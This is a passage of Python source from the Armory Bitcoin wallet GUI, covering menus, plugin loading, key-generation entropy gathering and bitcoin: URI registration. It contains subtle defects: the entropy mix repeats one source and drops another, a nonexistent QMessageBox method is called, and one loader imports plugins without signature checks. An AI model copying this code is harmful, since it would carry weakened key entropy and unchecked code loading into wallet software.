dlgImport = DlgImportAsciiBlock(self, self, title, descr, ftypes,
UnsignedTransaction)
dlgImport.exec_()
if dlgImport.returnObj:
DlgMultiSpendReview(self, self, dlgImport.returnObj).exec_()
simulMerge = lambda: DlgMergePromNotes(self, self).exec_()
actMakeProm = self.createAction('Simulfund &Promissory Note', mkprom)
actPromCollect = self.createAction('Simulfund &Collect && Merge', simulMerge)
actMultiSpend = self.createAction('Simulfund &Review && Sign', msrevsign)
if not self.usermode==USERMODE.Expert:
self.menusList[MENUS.MultiSig].menuAction().setVisible(False)
# Addresses
actAddrBook = self.createAction('View &Address Book...', self.execAddressBook)
actSweepKey = self.createAction('&Sweep Private Key/Address...', self.menuSelectSweepKey)
actImportKey = self.createAction('&Import Private Key/Address...', self.menuSelectImportKey)
self.menusList[MENUS.Addresses].addAction(actAddrBook)
if not currmode=='Standard':
self.menusList[MENUS.Addresses].addAction(actImportKey)
self.menusList[MENUS.Addresses].addAction(actSweepKey)
actCreateNew = self.createAction('&Create New Wallet', self.startWalletWizard)
actImportWlt = self.createAction('&Import or Restore Wallet', self.execImportWallet)
actAddressBook = self.createAction('View &Address Book', self.execAddressBook)
actRecoverWlt = self.createAction('&Fix Damaged Wallet', self.RecoverWallet)
self.menusList[MENUS.Wallets].addAction(actCreateNew)
self.menusList[MENUS.Wallets].addAction(actImportWlt)
self.menusList[MENUS.Wallets].addSeparator()
self.menusList[MENUS.Wallets].addAction(actRecoverWlt)
def execVersion():
self.explicitCheckAnnouncements()
self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Announce)
execAbout = lambda: DlgHelpAbout(self).exec_()
execTrouble = lambda: webbrowser.open('https://bitcoinarmory.com/troubleshooting/')
execBugReport = lambda: DlgBugReport(self, self).exec_()
execVerifySigned = lambda: VerifyOfflinePackageDialog(self, self).exec_()
actAboutWindow = self.createAction(tr('&About Armory...'), execAbout)
actVersionCheck = self.createAction(tr('Armory Version'), execVersion)
actDownloadUpgrade = self.createAction(tr('Update Software...'), self.openDownloaderAll)
actVerifySigned = self.createAction(tr('Verify Signed Package...'), execVerifySigned)
actTroubleshoot = self.createAction(tr('Troubleshooting Armory'), execTrouble)
actSubmitBug = self.createAction(tr('Submit Bug Report'), execBugReport)
actClearMemPool = self.createAction(tr('Clear All Unconfirmed'), self.clearMemoryPool)
actRescanDB = self.createAction(tr('Rescan Databases'), self.rescanNextLoad)
actRebuildDB = self.createAction(tr('Rebuild and Rescan Databases'), self.rebuildNextLoad)
actFactoryReset = self.createAction(tr('Factory Reset'), self.factoryReset)
actPrivacyPolicy = self.createAction(tr('Armory Privacy Policy'), self.showPrivacyGeneric)
self.menusList[MENUS.Help].addAction(actAboutWindow)
self.menusList[MENUS.Help].addAction(actVersionCheck)
self.menusList[MENUS.Help].addAction(actDownloadUpgrade)
self.menusList[MENUS.Help].addAction(actVerifySigned)
self.menusList[MENUS.Help].addSeparator()
self.menusList[MENUS.Help].addAction(actTroubleshoot)
self.menusList[MENUS.Help].addAction(actSubmitBug)
self.menusList[MENUS.Help].addAction(actPrivacyPolicy)
self.menusList[MENUS.Help].addSeparator()
self.menusList[MENUS.Help].addAction(actClearMemPool)
self.menusList[MENUS.Help].addAction(actRescanDB)
self.menusList[MENUS.Help].addAction(actRebuildDB)
self.menusList[MENUS.Help].addAction(actFactoryReset)
execMSHack = lambda: DlgSelectMultiSigOption(self,self).exec_()
execBrowse = lambda: DlgLockboxManager(self,self).exec_()
actMultiHacker = self.createAction(tr('Multi-Sig Lockboxes'), execMSHack)
actBrowseLockboxes = self.createAction(tr('Lockbox &Manager...'), execBrowse)
#self.menusList[MENUS.MultiSig].addAction(actMultiHacker)
self.menusList[MENUS.MultiSig].addAction(actBrowseLockboxes)
self.menusList[MENUS.MultiSig].addAction(actMakeProm)
self.menusList[MENUS.MultiSig].addAction(actPromCollect)
self.menusList[MENUS.MultiSig].addAction(actMultiSpend)
# Restore any main-window geometry saved in the settings file
hexgeom = self.settings.get('MainGeometry')
hexledgsz = self.settings.get('MainLedgerCols')
hexwltsz = self.settings.get('MainWalletCols')
if len(hexgeom)>0:
geom = QByteArray.fromHex(hexgeom)
self.restoreGeometry(geom)
if len(hexwltsz)>0:
restoreTableView(self.walletsView, hexwltsz)
if len(hexledgsz)>0:
restoreTableView(self.ledgerView, hexledgsz)
self.ledgerView.setColumnWidth(LEDGERCOLS.NumConf, 20)
self.ledgerView.setColumnWidth(LEDGERCOLS.TxDir, 72)
if DO_WALLET_CHECK:
self.checkWallets()
self.blkReceived = RightNow()
self.setDashboardDetails()
from twisted.internet import reactor
reactor.callLater(0.1, self.execIntroDialog)
reactor.callLater(1, self.Heartbeat)
if self.getSettingOrSetDefault('MinimizeOnOpen', False) and not CLI_ARGS:
LOGINFO('MinimizeOnOpen is True')
reactor.callLater(0, self.minimizeArmory)
if CLI_ARGS:
reactor.callLater(1, self.uriLinkClicked, CLI_ARGS[0])
if OS_MACOSX:
self.macNotifHdlr = ArmoryMac.MacNotificationHandler()
if self.macNotifHdlr.hasUserNotificationCenterSupport():
self.notifCtr = ArmoryMac.MacNotificationHandler.BuiltIn
else:
# In theory, Qt can support notifications via Growl on pre-10.8
# machines. It's shaky as hell, though, so we'll rely on alternate
# code for now. In the future, according to
# https://bugreports.qt-project.org/browse/QTBUG-33733 (which may not
# be accurate, as the official documentation is contradictory),
# showMessage() may have direct support for the OS X notification
# center in Qt5.1. Something to experiment with later....
self.notifCtr = self.macNotifHdlr.hasGrowl()
# Now that construction of the UI is done
# Check for warnings to be displayed
# This is true if and only if the command line has a data dir that doesn't exist
# and can't be created.
if not CLI_OPTIONS.datadir in [ARMORY_HOME_DIR, DEFAULT]:
QMessageBox.warning(self, tr('Default Data Directory'), tr("""
Armory is using the default data directory because
the data directory specified in the command line, could
not be found and could not be created."""), QMessageBox.Ok)
# This is true if and only if the command line has a database dir that doesn't exist
# and can't be created.
elif not CLI_OPTIONS.armoryDBDir in [ARMORY_DB_DIR, DEFAULT]:
QMessageBox.warning(self, tr('Default Database Directory'), tr("""
Armory is using the default database directory because
the database directory specified in the command line, could
not be found and could not be created."""), QMessageBox.Ok)
# This is true if and only if the command line has a bitcoin dir that doesn't exist
if not CLI_OPTIONS.satoshiHome in [BTC_HOME_DIR, DEFAULT]:
QMessageBox.warning(self, tr('Bitcoin Directory'), tr("""
Armory is using the default Bitcoin directory because
the Bitcoin director specified in the command line, could
not be found."""), QMessageBox.Ok)
if not self.getSettingOrSetDefault('DNAA_DeleteLevelDB', False) and \
os.path.exists(os.path.join(ARMORY_DB_DIR, LEVELDB_BLKDATA)):
reply = MsgBoxWithDNAA(self, self, MSGBOX.Question, 'Delete Old DB Directory', \
'Armory detected an older version Database. '
'Do you want to delete the old database? Choose yes if '
'do not think that you will revert to an older version of Armory.', 'Do not ask this question again')
if reply[0]==True:
shutil.rmtree(os.path.join(ARMORY_DB_DIR, LEVELDB_BLKDATA))
shutil.rmtree(os.path.join(ARMORY_DB_DIR, LEVELDB_HEADERS))
if reply[1]==True:
self.writeSetting('DNAA_DeleteLevelDB', True)
####################################################
def getWatchingOnlyWallets(self):
result = []
for wltID in self.walletIDList:
if self.walletMap[wltID].watchingOnly:
result.append(wltID)
return result
####################################################
def changeWltFilter(self):
currIdx = max(self.comboWltSelect.currentIndex(), 0)
currText = str(self.comboWltSelect.currentText()).lower()
if currText.lower().startswith('custom filter'):
self.walletsView.showColumn(0)
#self.walletsView.resizeColumnToContents(0)
else:
self.walletsView.hideColumn(0)
if currIdx != 4:
for i in range(0, len(self.walletVisibleList)):
self.walletVisibleList[i] = False
# If a specific wallet is selected, just set that and you're done
if currIdx > 4:
self.walletVisibleList[currIdx-7] = True
self.setWltSetting(self.walletIDList[currIdx-7], 'LedgerShow', True)
else:
# Else we walk through the wallets and flag the particular ones
typelist = [[wid, determineWalletType(self.walletMap[wid], self)[0]] \
for wid in self.walletIDList]
for i,winfo in enumerate(typelist):
wid,wtype = winfo[:]
if currIdx==0:
# My wallets
doShow = wtype in [WLTTYPES.Offline,WLTTYPES.Crypt,WLTTYPES.Plain]
self.walletVisibleList[i] = doShow
self.setWltSetting(wid, 'LedgerShow', doShow)
elif currIdx==1:
# Offline wallets
doShow = winfo[1] in [WLTTYPES.Offline]
self.walletVisibleList[i] = doShow
self.setWltSetting(wid, 'LedgerShow', doShow)
elif currIdx==2:
# Others' Wallets
doShow = winfo[1] in [WLTTYPES.WatchOnly]
self.walletVisibleList[i] = doShow
self.setWltSetting(wid, 'LedgerShow', doShow)
elif currIdx==3:
# All Wallets
self.walletVisibleList[i] = True
self.setWltSetting(wid, 'LedgerShow', True)
self.mainLedgerCurrentPage = 1
self.PageLineEdit.setText(str(self.mainLedgerCurrentPage))
self.wltIDList = []
for i,vis in enumerate(self.walletVisibleList):
if vis:
wltid = self.walletIDList[i]
if self.walletMap[wltid].isEnabled:
self.wltIDList.append(wltid)
try:
TheBDM.bdv().updateWalletsLedgerFilter(self.wltIDList)
except:
pass
############################################################################
def loadArmoryModulesNoZip(self):
"""
This method checks for any .py files in the exec directory
"""
moduleDir = os.path.join(GetExecDir(), MODULES_ZIP_DIR_NAME)
if not moduleDir or not os.path.exists(moduleDir):
return
LOGWARN('Attempting to load modules from: %s' % MODULES_ZIP_DIR_NAME)
# This call does not eval any code in the modules. It simply
# loads the python files as raw chunks of text so we can
# check hashes and signatures
modMap = getModuleListNoZip(moduleDir)
for moduleName,infoMap in modMap.iteritems():
module = dynamicImportNoZip(moduleDir, moduleName, globals())
plugObj = module.PluginObject(self)
if not hasattr(plugObj,'getTabToDisplay') or \
not hasattr(plugObj,'tabName'):
LOGERROR('Module is malformed! No tabToDisplay or tabName attrs')
QMessageBox.critmoduleName(self, tr("Bad Module"), tr("""
The module you attempted to load (%s) is malformed. It is
missing attributes that are needed for Armory to load it.
It will be skipped.""") % moduleName, QMessageBox.Ok)
continue
verPluginInt = getVersionInt(readVersionString(plugObj.maxVersion))
verArmoryInt = getVersionInt(BTCARMORY_VERSION)
if verArmoryInt >verPluginInt:
reply = QMessageBox.warning(self, tr("Outdated Module"), tr("""
Module "%s" is only specified to work up to Armory version %s.
You are using Armory version %s. Please remove the module if
you experience any problems with it, or contact the maintainer
for a new version.
<br><br>
Do you want to continue loading the module?"""),
QMessageBox.Yes | QMessageBox.No)
if not reply==QMessageBox.Yes:
continue
# All plugins should have "tabToDisplay" and "tabName" attributes
LOGWARN('Adding module to tab list: "' + plugObj.tabName + '"')
self.mainDisplayTabs.addTab(plugObj.getTabToDisplay(), plugObj.tabName)
# Also inject any extra methods that will be
injectFuncList = [ \
['injectHeartbeatAlwaysFunc', 'extraHeartbeatAlways'],
['injectHeartbeatOnlineFunc', 'extraHeartbeatOnline'],
['injectGoOnlineFunc', 'extraGoOnlineFunctions'],
['injectNewTxFunc', 'extraNewTxFunctions'],
['injectNewBlockFunc', 'extraNewBlockFunctions'],
['injectShutdownFunc', 'extraShutdownFunctions'] ]
# Add any methods
for plugFuncName,funcListName in injectFuncList:
if not hasattr(plugObj, plugFuncName):
continue
if not hasattr(self, funcListName):
LOGERROR('Missing an ArmoryQt list variable: %s' % funcListName)
continue
LOGINFO('Found module function: %s' % plugFuncName)
funcList = getattr(self, funcListName)
plugFunc = getattr(plugObj, plugFuncName)
funcList.append(plugFunc)
############################################################################
def loadArmoryModules(self):
"""
This method checks for any .zip files in the modules directory
"""
modulesZipDirPath = os.path.join(GetExecDir(), MODULES_ZIP_DIR_NAME)
if modulesZipDirPath and os.path.exists(modulesZipDirPath):
self.tempModulesDirName = tempfile.mkdtemp('modules')
# This call does not eval any code in the modules. It simply
# loads the python files as raw chunks of text so we can
# check hashes and signatures
modMap = getModuleList(modulesZipDirPath)
for moduleName,infoMap in modMap.iteritems():
moduleZipPath = os.path.join(modulesZipDirPath, infoMap[MODULE_PATH_KEY])
if infoMap[MODULE_ZIP_STATUS_KEY] == MODULE_ZIP_STATUS.Invalid:
reply = QMessageBox.warning(self, tr("Invalid Module"), tr("""
Armory detected the following module which is
<font color=%(color)s"><b>invalid</b></font>:
<br><br>
<b>Module Name:</b> %(name)s<br>
<b>Module Path:</b> %(path)s<br>
<br><br>
Armory will only run a module from a zip file that
has the required stucture.""") % \
{ 'color' : htmlColor('TextRed'), 'name' : moduleName, 'path' : moduleZipPath}, QMessageBox.Ok)
elif not USE_TESTNET and infoMap[MODULE_ZIP_STATUS_KEY] == MODULE_ZIP_STATUS.Unsigned:
reply = QMessageBox.warning(self, tr("UNSIGNED Module"), tr("""
Armory detected the following module which
<font color="%(color)s"><b>has not been signed by Armory</b></font> and may be dangerous:
<br><br>
<b>Module Name:</b> %(name)s<br>
<b>Module Path:</b> %(path)s<br>
<br><br>
Armory will not allow you to run this module.""") % \
{ 'color' : htmlColor('TextRed'), 'name' : moduleName, 'path' : moduleZipPath}, QMessageBox.Ok)
else:
ZipFile(moduleZipPath).extract(INNER_ZIP_FILENAME, self.tempModulesDirName)
ZipFile(os.path.join(self.tempModulesDirName,INNER_ZIP_FILENAME)).extractall(self.tempModulesDirName)
plugin = importModule(self.tempModulesDirName, moduleName, globals())
plugObj = plugin.PluginObject(self)
if not hasattr(plugObj,'getTabToDisplay') or \
not hasattr(plugObj,'tabName'):
LOGERROR('Module is malformed! No tabToDisplay or tabName attrs')
QMessageBox.critmoduleName(self, tr("Bad Module"), tr("""
The module you attempted to load (%s) is malformed. It is
missing attributes that are needed for Armory to load it.
It will be skipped.""") % moduleName, QMessageBox.Ok)
continue
verPluginInt = getVersionInt(readVersionString(plugObj.maxVersion))
verArmoryInt = getVersionInt(BTCARMORY_VERSION)
if verArmoryInt >verPluginInt:
reply = QMessageBox.warning(self, tr("Outdated Module"), tr("""
Module %(mod)s is only specified to work up to Armory version %(maxver)s.
You are using Armory version %(curver)s. Please remove the module if
you experience any problems with it, or contact the maintainer
for a new version.
<br><br>
Do you want to continue loading the module?""") \
% { 'mod' : moduleName, 'maxver' : plugObj.maxVersion,
'curver' : getVersionString(BTCARMORY_VERSION)} ,
QMessageBox.Yes | QMessageBox.No)
if not reply==QMessageBox.Yes:
continue
# All plugins should have "tabToDisplay" and "tabName" attributes
LOGWARN('Adding module to tab list: "' + plugObj.tabName + '"')
self.mainDisplayTabs.addTab(plugObj.getTabToDisplay(), plugObj.tabName)
# Also inject any extra methods that will be
injectFuncList = [ \
['injectHeartbeatAlwaysFunc', 'extraHeartbeatAlways'],
['injectHeartbeatOnlineFunc', 'extraHeartbeatOnline'],
['injectGoOnlineFunc', 'extraGoOnlineFunctions'],
['injectNewTxFunc', 'extraNewTxFunctions'],
['injectNewBlockFunc', 'extraNewBlockFunctions'],
['injectShutdownFunc', 'extraShutdownFunctions'] ]
# Add any methods
for plugFuncName,funcListName in injectFuncList:
if not hasattr(plugObj, plugFuncName):
continue
if not hasattr(self, funcListName):
LOGERROR('Missing an ArmoryQt list variable: %s' % funcListName)
continue
LOGINFO('Found module function: %s' % plugFuncName)
funcList = getattr(self, funcListName)
plugFunc = getattr(plugObj, plugFuncName)
funcList.append(plugFunc)
############################################################################
def factoryReset(self):
"""
reply = QMessageBox.information(self,'Factory Reset', \
'You are about to revert all Armory settings '
'to the state they were in when Armory was first installed. '
'<br><br>'
'If you click "Yes," Armory will exit after settings are '
'reverted. You will have to manually start Armory again.'
'<br><br>'
'Do you want to continue? ', \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.removeSettingsOnClose = True
self.closeForReal()
"""
if DlgFactoryReset(self,self).exec_():
# The dialog already wrote all the flag files, just close now
self.closeForReal()
####################################################
def showPrivacyGeneric(self):
DlgPrivacyPolicy().exec_()
####################################################
def clearMemoryPool(self):
touchFile( os.path.join(ARMORY_HOME_DIR, 'clearmempool.flag') )
msg = tr("""
The next time you restart Armory, all unconfirmed transactions will
be cleared allowing you to retry any stuck transactions.""")
if not self.doAutoBitcoind:
msg += tr("""
<br><br>Make sure you also restart Bitcoin-Qt
(or bitcoind) and let it synchronize again before you restart
Armory. Doing so will clear its memory pool, as well""")
QMessageBox.information(self, tr('Memory Pool'), msg, QMessageBox.Ok)
####################################################
def registerWidgetActivateTime(self, widget):
# This is a bit of a hack, but it's a very isolated method to make
# it easy to link widgets to my entropy accumulator
# I just realized this doesn't do exactly what I originally intended...
# I wanted it to work on arbitrary widgets like QLineEdits, but using
# super is not the answer. What I want is the original class method
# to be called after logging keypress, not its superclass method.
# Nonetheless, it does do what I need it to, as long as you only
# registered frames and dialogs, not individual widgets/controls.
mainWindow = self
def newKPE(wself, event=None):
mainWindow.logEntropy()
super(wself.__class__, wself).keyPressEvent(event)
def newKRE(wself, event=None):
mainWindow.logEntropy()
super(wself.__class__, wself).keyReleaseEvent(event)
def newMPE(wself, event=None):
mainWindow.logEntropy()
super(wself.__class__, wself).mousePressEvent(event)
def newMRE(wself, event=None):
mainWindow.logEntropy()
super(wself.__class__, wself).mouseReleaseEvent(event)
from types import MethodType
widget.keyPressEvent = MethodType(newKPE, widget)
widget.keyReleaseEvent = MethodType(newKRE, widget)
widget.mousePressEvent = MethodType(newMPE, widget)
widget.mouseReleaseEvent = MethodType(newMRE, widget)
####################################################
def logEntropy(self):
try:
self.entropyAccum.append(RightNow())
self.entropyAccum.append(QCursor.pos().x())
self.entropyAccum.append(QCursor.pos().y())
except:
LOGEXCEPT('Error logging keypress entropy')
####################################################
def getExtraEntropyForKeyGen(self):
# The entropyAccum var has all the timestamps, down to the microsecond,
# of every keypress and mouseclick made during the wallet creation
# wizard. Also logs mouse positions on every press, though it will
# be constant while typing. Either way, even, if they change no text
# and use a 5-char password, we will still pickup about 40 events.
# Then we throw in the [name,time,size] triplets of some volatile
# system directories, and the hash of a file in that directory that
# is expected to have timestamps and system-dependent parameters.
# Finally, take a desktop screenshot...
# All three of these source are likely to have sufficient entropy alone.
source1,self.entropyAccum = self.entropyAccum,[]
if len(source1)==0:
LOGERROR('Error getting extra entropy from mouse & key presses')
source2 = []
try:
if OS_WINDOWS:
tempDir = os.getenv('TEMP')
extraFiles = []
elif OS_LINUX:
tempDir = '/var/log'
extraFiles = ['/var/log/Xorg.0.log']
elif OS_MACOSX:
tempDir = '/var/log'
extraFiles = ['/var/log/system.log']
# A simple listing of the directory files, sizes and times is good
if os.path.exists(tempDir):
for fname in os.listdir(tempDir):
fullpath = os.path.join(tempDir, fname)
sz = os.path.getsize(fullpath)
tm = os.path.getmtime(fullpath)
source2.append([fname, sz, tm])
# On Linux we also throw in Xorg.0.log
for f in extraFiles:
if os.path.exists(f):
with open(f,'rb') as infile:
source2.append(hash256(infile.read()))
if len(source2)==0:
LOGWARN('Second source of supplemental entropy will be empty')
except:
LOGEXCEPT('Error getting extra entropy from filesystem')
source3 = ''
try:
pixDesk = QPixmap.grabWindow(QApplication.desktop().winId())
pixRaw = QByteArray()
pixBuf = QBuffer(pixRaw)
pixBuf.open(QIODevice.WriteOnly)
pixDesk.save(pixBuf, 'PNG')
source3 = pixBuf.buffer().toHex()
except:
LOGEXCEPT('Third source of entropy (desktop screenshot) failed')
if len(source3)==0:
LOGWARN('Error getting extra entropy from screenshot')
LOGINFO('Adding %d keypress events to the entropy pool', len(source1)/3)
LOGINFO('Adding %s bytes of filesystem data to the entropy pool',
bytesToHumanSize(len(str(source2))))
LOGINFO('Adding %s bytes from desktop screenshot to the entropy pool',
bytesToHumanSize(len(str(source3))/2))
allEntropy = ''.join([str(a) for a in [source1, source1, source3]])
return SecureBinaryData(HMAC256('Armory Entropy', allEntropy))
####################################################
def rescanNextLoad(self):
reply = QMessageBox.warning(self, tr('Queue Rescan?'), tr("""
The next time you restart Armory, it will rescan the blockchain
database, and reconstruct your wallet histories from scratch.
The rescan will take 10-60 minutes depending on your system.
<br><br>
Do you wish to force a rescan on the next Armory restart?"""), \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
touchFile( os.path.join(ARMORY_HOME_DIR, 'rescan.flag') )
####################################################
def rebuildNextLoad(self):
reply = QMessageBox.warning(self, tr('Queue Rebuild?'), tr("""
The next time you restart Armory, it will rebuild and rescan
the entire blockchain database. This operation can take between
30 minutes and 4 hours depending on you system speed.
<br><br>
Do you wish to force a rebuild on the next Armory restart?"""), \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
touchFile( os.path.join(ARMORY_HOME_DIR, 'rebuild.flag') )
####################################################
def loadFailedManyTimesFunc(self, nFail):
"""
For now, if the user is having trouble loading the blockchain, all
we do is delete mempool.bin (which is frequently corrupted but not
detected as such. However, we may expand this in the future, if
it's determined that more-complicated things are necessary.
"""
LOGERROR('%d attempts to load blockchain failed. Remove mempool.bin.' % nFail)
mempoolfile = os.path.join(ARMORY_HOME_DIR,'mempool.bin')
if os.path.exists(mempoolfile):
os.remove(mempoolfile)
else:
LOGERROR('File mempool.bin does not exist. Nothing deleted.')
####################################################
def menuSelectImportKey(self):
QMessageBox.information(self, 'Select Wallet', \
'You must import an address into a specific wallet. If '
'you do not want to import the key into any available wallet, '
'it is recommeneded you make a new wallet for this purpose.'
'<br><br>'
'Double-click on the desired wallet from the main window, then '
'click on "Import/Sweep Private Keys" on the bottom-right '
'of the properties window.'
'<br><br>'
'Keys cannot be imported into watching-only wallets, only full '
'wallets.', QMessageBox.Ok)
####################################################
def menuSelectSweepKey(self):
QMessageBox.information(self, 'Select Wallet', \
'You must select a wallet into which funds will be swept. '
'Double-click on the desired wallet from the main window, then '
'click on "Import/Sweep Private Keys" on the bottom-right '
'of the properties window to sweep to that wallet.'
'<br><br>'
'Keys cannot be swept into watching-only wallets, only full '
'wallets.', QMessageBox.Ok)
####################################################
def changeNumShow(self):
prefWidth = self.numShowOpts[self.comboNumShow.currentIndex()]
if prefWidth=='All':
self.currLedgMin = 1;
self.currLedgMax = self.ledgerSize
self.currLedgWidth = -1;
else:
self.currLedgMax = self.currLedgMin + prefWidth - 1
self.currLedgWidth = prefWidth
self.applyLedgerRange()
####################################################
def clickLedgUp(self):
self.currLedgMin -= self.currLedgWidth
self.currLedgMax -= self.currLedgWidth
self.applyLedgerRange()
####################################################
def clickLedgDn(self):
self.currLedgMin += self.currLedgWidth
self.currLedgMax += self.currLedgWidth
self.applyLedgerRange()
####################################################
def applyLedgerRange(self):
if self.currLedgMin < 1:
toAdd = 1 - self.currLedgMin
self.currLedgMin += toAdd
self.currLedgMax += toAdd
if self.currLedgMax > self.ledgerSize:
toSub = self.currLedgMax - self.ledgerSize
self.currLedgMin -= toSub
self.currLedgMax -= toSub
self.currLedgMin = max(self.currLedgMin, 1)
self.btnLedgUp.setVisible(self.currLedgMin!=1)
self.btnLedgDn.setVisible(self.currLedgMax!=self.ledgerSize)
self.createCombinedLedger()
####################################################
def openSettings(self):
LOGDEBUG('openSettings')
dlgSettings = DlgSettings(self, self)
dlgSettings.exec_()
####################################################
def setupSystemTray(self):
LOGDEBUG('setupSystemTray')
# Creating a QSystemTray
self.sysTray = QSystemTrayIcon(self)
self.sysTray.setIcon( QIcon(self.iconfile) )
self.sysTray.setVisible(True)
self.sysTray.setToolTip('Armory' + (' [Testnet]' if USE_TESTNET else ''))
self.connect(self.sysTray, SIGNAL('messageClicked()'), self.bringArmoryToFront)
self.connect(self.sysTray, SIGNAL('activated(QSystemTrayIcon::ActivationReason)'), \
self.sysTrayActivated)
menu = QMenu(self)
def traySend():
self.bringArmoryToFront()
self.clickSendBitcoins()
def trayRecv():
self.bringArmoryToFront()
self.clickReceiveCoins()
actShowArmory = self.createAction('Show Armory', self.bringArmoryToFront)
actSendBtc = self.createAction('Send Bitcoins', traySend)
actRcvBtc = self.createAction('Receive Bitcoins', trayRecv)
actClose = self.createAction('Quit Armory', self.closeForReal)
# Create a short menu of options
menu.addAction(actShowArmory)
menu.addAction(actSendBtc)
menu.addAction(actRcvBtc)
menu.addSeparator()
menu.addAction(actClose)
self.sysTray.setContextMenu(menu)
self.notifyQueue = []
self.notifyBlockedUntil = 0
#############################################################################
@AllowAsync
def registerBitcoinWithFF(self):
#the 3 nodes needed to add to register bitcoin as a protocol in FF
rdfschemehandler = 'about=\"urn:scheme:handler:bitcoin\"'
rdfscheme = 'about=\"urn:scheme:bitcoin\"'
rdfexternalApp = 'about=\"urn:scheme:externalApplication:bitcoin\"'
#find mimeTypes.rdf file
home = os.getenv('HOME')
out,err = execAndWait('find %s -type f -name \"mimeTypes.rdf\"' % home)
for rdfs in out.split('\n'):
if rdfs:
try:
FFrdf = open(rdfs, 'r+')
except:
continue
ct = FFrdf.readlines()
rdfsch=-1
rdfsc=-1
rdfea=-1
i=0
#look for the nodes
for line in ct:
if rdfschemehandler in line:
rdfsch=i
elif rdfscheme in line:
rdfsc=i
elif rdfexternalApp in line:
rdfea=i
i+=1
#seek to end of file
FFrdf.seek(-11, 2)
i=0;
#add the missing nodes
if rdfsch == -1:
FFrdf.write(' <RDF:Description RDF:about=\"urn:scheme:handler:bitcoin\"\n')
FFrdf.write(' NC:alwaysAsk=\"false\">\n')
FFrdf.write(' <NC:externalApplication RDF:resource=\"urn:scheme:externalApplication:bitcoin\"/>\n')
FFrdf.write(' <NC:possibleApplication RDF:resource=\"urn:handler:local:/usr/bin/xdg-open\"/>\n')
FFrdf.write(' </RDF:Description>\n')
i+=1
if rdfsc == -1:
FFrdf.write(' <RDF:Description RDF:about=\"urn:scheme:bitcoin\"\n')
FFrdf.write(' NC:value=\"bitcoin\">\n')
FFrdf.write(' <NC:handlerProp RDF:resource=\"urn:scheme:handler:bitcoin\"/>\n')
FFrdf.write(' </RDF:Description>\n')
i+=1
if rdfea == -1:
FFrdf.write(' <RDF:Description RDF:about=\"urn:scheme:externalApplication:bitcoin\"\n')
FFrdf.write(' NC:prettyName=\"xdg-open\"\n')
FFrdf.write(' NC:path=\"/usr/bin/xdg-open\" />\n')
i+=1
if i != 0:
FFrdf.write('</RDF:RDF>\n')
FFrdf.close()
#############################################################################
def setupUriRegistration(self, justDoIt=False):
"""
Setup Armory as the default application for handling bitcoin: links
"""
LOGINFO('setupUriRegistration')
if USE_TESTNET:
return
if OS_LINUX:
out,err = execAndWait('gconftool-2 --get /desktop/gnome/url-handlers/bitcoin/command')
out2,err = execAndWait('xdg-mime query default x-scheme-handler/bitcoin')
#check FF protocol association
#checkFF_thread = threading.Thread(target=self.registerBitcoinWithFF)
#checkFF_thread.start()
self.registerBitcoinWithFF(async=True)
def setAsDefault():
LOGINFO('Setting up Armory as default URI handler...')
execAndWait('gconftool-2 -t string -s /desktop/gnome/url-handlers/bitcoin/command "python /usr/lib/armory/ArmoryQt.py \"%s\""')
execAndWait('gconftool-2 -s /desktop/gnome/url-handlers/bitcoin/needs_terminal false -t bool')
execAndWait('gconftool-2 -t bool -s /desktop/gnome/url-handlers/bitcoin/enabled true')
execAndWait('xdg-mime default armory.desktop x-scheme-handler/bitcoin')
if ('no value' in out.lower() or 'no value' in err.lower()) and not 'armory.desktop' in out2.lower():
# Silently add Armory if it's never been set before
setAsDefault()
elif (not 'armory' in out.lower() or not 'armory.desktop' in out2.lower()) and not self.firstLoad:
# If another application has it, ask for permission to change it
# Don't bother the user on the first load with it if verification is
# needed. They have enough to worry about with this weird new program...
if not self.getSettingOrSetDefault('DNAA_DefaultApp', False):
reply = MsgBoxWithDNAA(self, self, MSGBOX.Question, 'Default URL Handler', \
'Armory is not set as your default application for handling '
'"bitcoin:" links. Would you like to use Armory as the '
'default?', 'Do not ask this question again')
if reply[0]==True:
setAsDefault()
if reply[1]==True:
self.writeSetting('DNAA_DefaultApp', True)
elif OS_WINDOWS:
# Check for existing registration (user first, then root, if necessary)
action = 'DoNothing'
modulepathname = '"'
if getattr(sys, 'frozen', False):
app_dir = os.path.dirname(sys.executable)
app_path = os.path.join(app_dir, sys.executable)
elif __file__:
return #running from a .py script, not gonna register URI on Windows
#justDoIt = True
import ctypes
GetModuleFileNameW = ctypes.windll.kernel32.GetModuleFileNameW
GetModuleFileNameW.restype = ctypes.c_int
app_path = ctypes.create_string_buffer(1024)
rtlength = ctypes.c_int()
rtlength = GetModuleFileNameW(None, ctypes.byref(app_path), 1024)
passstr = str(app_path.raw)
modulepathname += unicode(passstr[0:(rtlength*2)], encoding='utf16') + u'" "%1"'
modulepathname = modulepathname.encode('utf8')
rootKey = 'bitcoin\\shell\\open\\command'
try:
userKey = 'Software\\Classes\\' + rootKey
registryKey = OpenKey(HKEY_CURRENT_USER, userKey, 0, KEY_READ)
val,code = QueryValueEx(registryKey, '')
if 'armory' in val.lower():
if val.lower()==modulepathname.lower():
LOGINFO('Armory already registered for current user. Done!')
return
else:
action = 'DoIt' #armory is registered, but to another path
else:
# Already set to something (at least created, which is enough)
action = 'AskUser'
except:
# No user-key set, check if root-key is set
try:
registryKey = OpenKey(HKEY_CLASSES_ROOT, rootKey, 0, KEY_READ)
val,code = QueryValueEx(registryKey, '')
if 'armory' in val.lower():
LOGINFO('Armory already registered at admin level. Done!')
return
else:
# Root key is set (or at least created, which is enough)
action = 'AskUser'
except:
action = 'DoIt'
dontAsk = self.getSettingOrSetDefault('DNAA_DefaultApp', False)
dontAskDefault = self.getSettingOrSetDefault('AlwaysArmoryURI', False)
if justDoIt:
LOGINFO('URL-register: just doing it')
action = 'DoIt'
elif dontAsk and dontAskDefault:
LOGINFO('URL-register: user wants to do it by default')
action = 'DoIt'
elif action=='AskUser' and not self.firstLoad and not dontAsk:
# If another application has it, ask for permission to change it
# Don't bother the user on the first load with it if verification is
# needed. They have enough to worry about with this weird new program...
reply = MsgBoxWithDNAA(self, self, MSGBOX.Question, 'Default URL Handler', \
'Armory is not set as your default application for handling '
'"bitcoin:" links. Would you like to use Armory as the '
'default?', 'Do not ask this question again')
if reply[1]==True:
LOGINFO('URL-register: do not ask again: always %s', str(reply[0]))
